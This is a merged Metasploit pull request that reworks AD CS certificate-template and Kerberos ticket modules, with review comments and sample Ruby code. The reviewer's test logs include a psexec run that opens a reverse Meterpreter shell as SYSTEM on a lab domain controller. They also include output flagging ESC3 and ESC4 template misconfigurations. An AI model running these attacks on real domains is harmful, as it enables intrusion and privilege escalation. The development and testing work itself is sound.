AD CS Workflow Related Changes #19849

Merged
merged 11 commits into from
Jan 31, 2025

Conversation

zeroSteiner
Contributor

This makes changes to a few modules to enable them to be used as part of larger workflow automation. For all three modules, it adds a return value to indicate that the operation was successful and includes some relevant information.

Most of the changes are to the ldap_esc_vulnerable_cert_finder module. The changes include:

  • Many LDAP objects are now cached in an @ldap_objects array. This means that repeated lookups for objects by samAccountName, objectSid, etc. can return the same object. This results in a noticeable reduction in LDAP queries to the server.
  • Added a #build_certificate_details method to consolidate the collection of information about certificate templates. This makes it easier in the future to add additional data points without needing to update multiple methods.
  • All certificates are queried initially so common attributes of them are stored with #build_certificate_details. This ensures that all certificates are returned with common information, regardless of their vulnerability status.
  • DNS records are looked up from LDAP to avoid crashing in instances where the DNS hostname of the CA server cannot be resolved by Metasploit's running configuration. This would be the case when a DC is targeted without the ability to resolve addresses within its domain.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • For each of the modules, use them and see that the results are still the same
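The multi-key object cache described in the first bullet above, as an added example that is not code from this PR or from Metasploit. `FakeLdap`, its inline directory snapshot and the SIDs in it are constructed stand-ins; `LdapObjectCache` shows the pattern: one `@ldap_objects` array, and a lookup by sAMAccountName, objectSid or DN that hits the server only on a miss and hands back the very same object afterwards.

```ruby
# Constructed stand-in for the LDAP connection: answers from an inline
# directory snapshot and counts the searches it receives.
class FakeLdap
  attr_reader :search_count

  # Constructed sample directory; attribute names as LDAP returns them.
  ENTRIES = [
    { 'samaccountname' => 'Administrator',
      'objectsid' => 'S-1-5-21-1-2-3-500',
      'dn' => 'CN=Administrator,CN=Users,DC=demo,DC=local' },
    { 'samaccountname' => 'Domain Admins',
      'objectsid' => 'S-1-5-21-1-2-3-512',
      'dn' => 'CN=Domain Admins,CN=Users,DC=demo,DC=local' }
  ].freeze

  def initialize
    @search_count = 0
  end

  # Equality search on one attribute, i.e. the filter (attr=value).
  # Each call returns fresh Hash objects, as a real LDAP client would.
  def search(attr, value)
    @search_count += 1
    ENTRIES.select { |e| e[attr].casecmp?(value) }.map(&:dup)
  end
end

# Cache in the style the PR describes: every fetched object goes into
# @ldap_objects once and can then be found again by any identifying key.
class LdapObjectCache
  KEYS = %w[samaccountname objectsid dn].freeze

  def initialize(ldap)
    @ldap = ldap
    @ldap_objects = []
  end

  # Return the object matching (attr=value), querying LDAP only on a miss.
  def lookup(attr, value)
    raise ArgumentError, "unsupported key #{attr}" unless KEYS.include?(attr)
    cached = @ldap_objects.find { |o| o[attr].casecmp?(value) }
    return cached if cached
    fetched = @ldap.search(attr, value).first
    @ldap_objects << fetched if fetched
    fetched
  end

  def size
    @ldap_objects.size
  end
end

# Look the same account up by name, SID and DN; returns
# [ldap_queries_sent, all_three_lookups_returned_the_same_object].
def demo_cache_hit
  ldap = FakeLdap.new
  cache = LdapObjectCache.new(ldap)
  by_name = cache.lookup('samaccountname', 'administrator')
  by_sid  = cache.lookup('objectsid', 'S-1-5-21-1-2-3-500')
  by_dn   = cache.lookup('dn', 'CN=Administrator,CN=Users,DC=demo,DC=local')
  [ldap.search_count, by_name.equal?(by_sid) && by_sid.equal?(by_dn)]
end
```

Misses are not cached, so a lookup for an object that does not exist is repeated on every call; the module's real cache only ever stores objects that were found.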

@jheysel-r7 jheysel-r7 self-assigned this Jan 30, 2025
@zeroSteiner zeroSteiner force-pushed the feat/mod/ldap/esc-finder-updates branch 2 times, most recently from 5d1cb6e to d7f0057 on January 30, 2025 19:31
@zeroSteiner zeroSteiner force-pushed the feat/mod/ldap/esc-finder-updates branch from d7f0057 to 61a0981 on January 30, 2025 19:43
@jheysel-r7 jheysel-r7 left a comment

Great additions/refactoring @zeroSteiner.

I verified that the actions in ad_cs_cert_template produce the same results as before this change and that the get_ticket module still produces valid, usable tickets.

There were a couple of differences noticed when testing the ldap_esc_vulnerable_cert_finder. Now when a cert is only vulnerable to ESC4 the module correctly lists the Required Signatures attribute, which it did not before, an improvement stemming from build_certificate_details/the standardization of certificate templates in the module.

The other two minor differences are listed below.

hash[:certificate_write_priv_sids].each do |sid|
if hash[:write_enabled_sids]
print_status(' Certificate Template Write-Enabled SIDs:')
hash[:write_enabled_sids].each do |sid|
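Review bot: the key checked and iterated here, `hash[:write_enabled_sids]`, does not match the `write_sids` key that replaced `certificate_write_priv_sids` in this refactor, so the guard is always nil and the Write-Enabled SIDs block is silently skipped; the `if` and the `.each` should both use the renamed key. Two smaller points on the same lines: an `if` on an array is truthy even when the array is empty, so `if hash[:write_sids]&.any?` avoids printing a header with nothing under it, and the header string `' Certificate Template Write-Enabled SIDs:'` carries a single leading space where the sibling `Certificate Template Enrollment SIDs:` header is indented by two, so the two headers do not line up in the module output shown later in this thread.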
certificate_write_priv_sids was refactored (good call) - it's now being stored in the hash as write_sids but here the module is checking for and attempting to print write_enabled_sids which is currently empty.

lib/rex/proto/ms_dnsp.rb (review comment outdated, resolved)
Use DNS first, then fail back to LDAP
@jheysel-r7 jheysel-r7 left a comment

Changes to the FQDN lookup look good 👍 One more small suggestion.
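The "DNS first, then fall back to LDAP" lookup that this commit and the PR description refer to, as an added example that is neither the PR's code nor Rex::Proto::MsDnsp. It assumes the dnsRecord values of the host's dnsNode object have already been fetched from the DomainDnsZones partition and parses them as MS-DNSP DNS_RPC_RECORD structures; `parse_dns_rpc_record`, `build_a_record`, `EmptyResolver` and `resolve_ca_host` are names introduced here, and the record blobs and the resolver that answers nothing are constructed.

```ruby
require 'resolv'
require 'ipaddr'

DNS_TYPE_A = 1             # MS-DNSP record type for an IPv4 address record
RPC_RECORD_HEADER_LEN = 24 # bytes from DataLength through TimeStamp

# Parse one MS-DNSP DNS_RPC_RECORD blob (the value of a dnsNode's dnsRecord
# attribute). Returns [type, ttl, data] or nil when the blob is truncated.
def parse_dns_rpc_record(blob)
  return nil if blob.bytesize < RPC_RECORD_HEADER_LEN

  # DataLength, Type, Version, Rank, Flags, Serial are little-endian;
  # TtlSeconds is stored big-endian. Reserved and TimeStamp are skipped.
  data_length, type, _version, _rank, _flags, _serial, ttl = blob.unpack('vvCCvVN')
  data = blob.byteslice(RPC_RECORD_HEADER_LEN, data_length)
  return nil if data.nil? || data.bytesize != data_length

  [type, ttl, data]
end

# Collect the IPv4 addresses from a list of dnsRecord blobs, ignoring other
# record types and malformed entries.
def a_records_from_ldap(blobs)
  blobs.filter_map do |blob|
    type, _ttl, data = parse_dns_rpc_record(blob)
    next unless type == DNS_TYPE_A && data.bytesize == 4

    IPAddr.new_ntoh(data).to_s
  end
end

# Build a constructed dnsRecord blob for an A record (sample input only).
def build_a_record(ip, ttl: 600)
  data = IPAddr.new(ip).hton
  [data.bytesize, DNS_TYPE_A, 5, 0xF0, 0, 1, ttl, 0, 0].pack('vvCCvVNVV') + data
end

# Constructed resolver that answers nothing, standing in for a Metasploit host
# that cannot resolve names inside the target domain.
class EmptyResolver
  def getaddresses(_name)
    []
  end
end

# Resolve the CA host: the local resolver first, then the A records pulled from
# LDAP. ldap_records is the (already fetched) list of dnsRecord values for the
# host's dnsNode. Returns [:dns | :ldap | :none, addresses].
def resolve_ca_host(fqdn, ldap_records:, resolver: Resolv::DNS.new)
  addrs = begin
    resolver.getaddresses(fqdn).map(&:to_s)
  rescue Resolv::ResolvError, SocketError, Errno::ECONNREFUSED
    []
  end
  return [:dns, addrs] unless addrs.empty?

  addrs = a_records_from_ldap(ldap_records)
  addrs.empty? ? [:none, []] : [:ldap, addrs]
end
```

The `:none` result is the case the module used to crash on; returning it lets the caller print a warning like the "No IP addresses were found for dc1.demo.local via DNS" line in the run output and carry on with the remaining templates.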

@jheysel-r7 jheysel-r7 added enhancement rn-enhancement release notes enhancement labels Jan 31, 2025
@jheysel-r7 jheysel-r7 left a comment

Get ticket module working as expected:

msf6 auxiliary(admin/kerberos/get_ticket) > run domain=kerberos.issue rhost=172.16.199.200 username=administrator password=N0tpassword!
[*] Running module against 172.16.199.200
[*] 172.16.199.200:88 - Getting TGT for administrator@kerberos.issue
[+] 172.16.199.200:88 - Received a valid TGT-Response
[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250131143855_default_172.16.199.200_mit.kerberos.cca_540876.bin
[*] Auxiliary module execution completed
msf6 exploit(windows/smb/psexec) > run rhosts=172.16.199.200 smbuser=administrator smbdomain=kerberos.issue SMB::Auth=kerberos smb::rhostname=dc2.kerberos.issue
[*] Started reverse TCP handler on 192.168.1.65:4444
[*] 172.16.199.200:445 - Connecting to the server...
[*] 172.16.199.200:445 - Authenticating to 172.16.199.200:445|kerberos.issue as user 'administrator'...
[*] 172.16.199.200:445 - Using cached credential for krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE Administrator@KERBEROS.ISSUE
[*] 172.16.199.200:445 - Using KDC dc2.kerberos.issue for realm kerberos.issue
[+] 172.16.199.200:445 - dc2.kerberos.issue:88 - Received a valid TGS-Response
[*] 172.16.199.200:445 - 172.16.199.200:445 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250131143933_default_172.16.199.200_mit.kerberos.cca_840179.bin
[+] 172.16.199.200:445 - dc2.kerberos.issue:88 - Received a valid delegation TGS-Response
[*] 172.16.199.200:445 - Executing the payload...
[+] 172.16.199.200:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (177734 bytes) to 192.168.1.65
[*] Meterpreter session 1 opened (192.168.1.65:4444 -> 192.168.1.65:64415) at 2025-01-31 14:39:41 -0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC2
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : KERBEROS
Logged On Users : 9
Meterpreter     : x86/windows
meterpreter >

AD CS Certificate Template Management module working as expected:

msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run domain=demo.local password=N0tpassword! username=Administrator rhost=172.16.199.100
[*] Running module against 172.16.199.100
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*] Certificate template data written to: /Users/jheysel/.msf4/loot/20250131144201_default_172.16.199.100_windows.ad.cs.te_038079.json
[*] Certificate Template:
[*]   distinguishedName: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   displayName:       User
[*]   objectGUID:        23b19584-4b39-4fd3-a115-9706478ef46d
[*]   msPKI-Certificate-Name-Flag: 0xa6000000
[*]     * CT_FLAG_SUBJECT_ALT_REQUIRE_UPN
[*]     * CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL
[*]     * CT_FLAG_SUBJECT_REQUIRE_EMAIL
[*]     * CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
[*]   msPKI-Enrollment-Flag: 0x00000029
[*]     * CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS
[*]     * CT_FLAG_PUBLISH_TO_DS
[*]     * CT_FLAG_AUTO_ENROLLMENT
[*]   msPKI-Private-Key-Flag: 0x00000010
[*]     * CT_FLAG_EXPORTABLE_KEY
[*]   msPKI-RA-Signature: 0x00000000
[*]   msPKI-Template-Schema-Version: 1
[*]   pKIKeyUsage: 0x00000000
[*]   pKIExtendedKeyUsage:
[*]     * 1.3.6.1.4.1.311.10.3.4 (Encrypting File System)
[*]     * 1.3.6.1.5.5.7.3.4 (Secure Email)
[*]     * 1.3.6.1.5.5.7.3.2 (Client Authentication)
[*]   pKIMaxIssuingDepth: 0
[+] The operation completed successfully!
[*] Auxiliary module execution completed

Misconfigured Certificate Template Finder module working as expected:

msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run domain=demo.local username=Administrator password=N0tpassword! rhost=172.16.199.100
[*] Running module against 172.16.199.100
[*] Discovering base DN automatically
[!] Couldn't find any vulnerable ESC13 templates!
[!] No IP addresses were found for dc1.demo.local via DNS.
[+] Template: Copy of Authenticated Session
[*]   Distinguished Name: CN=Copy of Authenticated Session,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC4
[*]   Notes:
[*]     * ESC4: The account: Administrator has edit permissions over the template Copy of Authenticated Session making it vulnerable to ESC4
[*]     * ESC4: The account: Administrator is a part of the following groups: (Domain Admins, Enterprise Admins) which have edit permissions over the template object
[*]  Certificate Template Write-Enabled SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-500 (Administrator)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-3380 (ANNABELLE_RAMSEY)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-513 (Domain Users)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-3380 (ANNABELLE_RAMSEY)
[+]   Issuing CA: demo-DC1-CA (dc1.demo.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[+] Template: Copy of Basic EFS
[*]   Distinguished Name: CN=Copy of Basic EFS,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC4
[*]   Notes:
[*]     * ESC4: The account: Administrator has edit permissions over the template Copy of Basic EFS making it vulnerable to ESC4
[*]     * ESC4: The account: Administrator is a part of the following groups: (Domain Admins, Enterprise Admins) which have edit permissions over the template object
[*]  Certificate Template Write-Enabled SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-3350 (DANIAL_BARKER)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-500 (Administrator)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-3350 (DANIAL_BARKER)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-513 (Domain Users)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[+]   Issuing CA: demo-DC1-CA (dc1.demo.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[+] Template: Copy of CEP Encryption
[*]   Distinguished Name: CN=Copy of CEP Encryption,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC3, ESC4
[*]   Notes:
[*]     * ESC3: Template defines the Certificate Request Agent OID (PkiExtendedKeyUsage)
[*]     * ESC4: The account: Administrator has edit permissions over the template Copy of CEP Encryption making it vulnerable to ESC4
[*]     * ESC4: The account: Administrator is a part of the following groups: (Domain Admins, Enterprise Admins) which have edit permissions over the template object
[*]  Certificate Template Write-Enabled SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-500 (Administrator)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-1516 (BETHANY_GAY)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-1516 (BETHANY_GAY)
[+]   Issuing CA: demo-DC1-CA (dc1.demo.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[+] Template: Copy of Code Signing
[*]   Distinguished Name: CN=Copy of Code Signing,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC4
[*]   Notes:
[*]     * ESC4: The account: Administrator has edit permissions over the template Copy of Code Signing making it vulnerable to ESC4
[*]     * ESC4: The account: Administrator is a part of the following groups: (Domain Admins, Enterprise Admins) which have edit permissions over the template object
[*]  Certificate Template Write-Enabled SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-500 (Administrator)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-3165 (STEPHAN_MOSLEY)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-3165 (STEPHAN_MOSLEY)
[+]   Issuing CA: demo-DC1-CA (dc1.demo.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[+] Template: Copy of Computer
[*]   Distinguished Name: CN=Copy of Computer,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC4
[*]   Notes:
[*]     * ESC4: The account: Administrator has edit permissions over the template Copy of Computer making it vulnerable to ESC4
[*]     * ESC4: The account: Administrator is a part of the following groups: (Domain Admins, Enterprise Admins, Authenticated Users) which have edit permissions over the template object
[*]  Certificate Template Write-Enabled SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-500 (Administrator)
[*]     * S-1-5-11 (Authenticated Users)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-515 (Domain Computers)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]     * S-1-5-11 (Authenticated Users)
[+]   Issuing CA: demo-DC1-CA (dc1.demo.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[+] Template: EFS
[*]   Distinguished Name: CN=EFS,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC4
[*]   Notes: ESC4: The account: Administrator is a part of the following groups: (Domain Admins, Enterprise Admins) which have edit permissions over the template object
[*]  Certificate Template Write-Enabled SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-513 (Domain Users)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[+]   Issuing CA: demo-DC1-CA (dc1.demo.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[+] Template: Machine
[*]   Distinguished Name: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC3_TEMPLATE_2, ESC4
[*]   Notes: ESC4: The account: Administrator is a part of the following groups: (Domain Admins, Enterprise Admins) which have edit permissions over the template object
[*]  Certificate Template Write-Enabled SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-515 (Domain Computers)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[+]   Issuing CA: demo-DC1-CA (dc1.demo.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[+] Template: User
[*]   Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=demo,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC3_TEMPLATE_2, ESC4
[*]   Notes: ESC4: The account: Administrator is a part of the following groups: (Domain Admins, Enterprise Admins) which have edit permissions over the template object
[*]  Certificate Template Write-Enabled SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-513 (Domain Users)
[*]     * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[+]   Issuing CA: demo-DC1-CA (dc1.demo.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-519 (Enterprise Admins)
[*]       * S-1-5-21-3907774564-2315225553-1676620424-512 (Domain Admins)
[*] Auxiliary module execution completed

@jheysel-r7
Contributor

Release Notes

This makes changes to the ldap_esc_vulnerable_cert_finder, ad_cs_cert_template and get_ticket modules to enable them to be used as part of larger workflow automation. For all three modules, it adds a return value to indicate that the operation was successful and includes some relevant information. LDAP object caching has been introduced to reduce the number of queries sent to the target. A #build_certificate_details method has been added to consolidate the collection of information about certificate templates. This ensures that all certificates are returned with common information, regardless of their vulnerability status. DNS records are looked up from LDAP to avoid crashing in instances where the DNS hostname of the CA server cannot be resolved by Metasploit's running configuration. This would be the case when a DC is targeted without the ability to resolve addresses within its domain.

@jheysel-r7 jheysel-r7 merged commit f3eefc0 into rapid7:master Jan 31, 2025
84 checks passed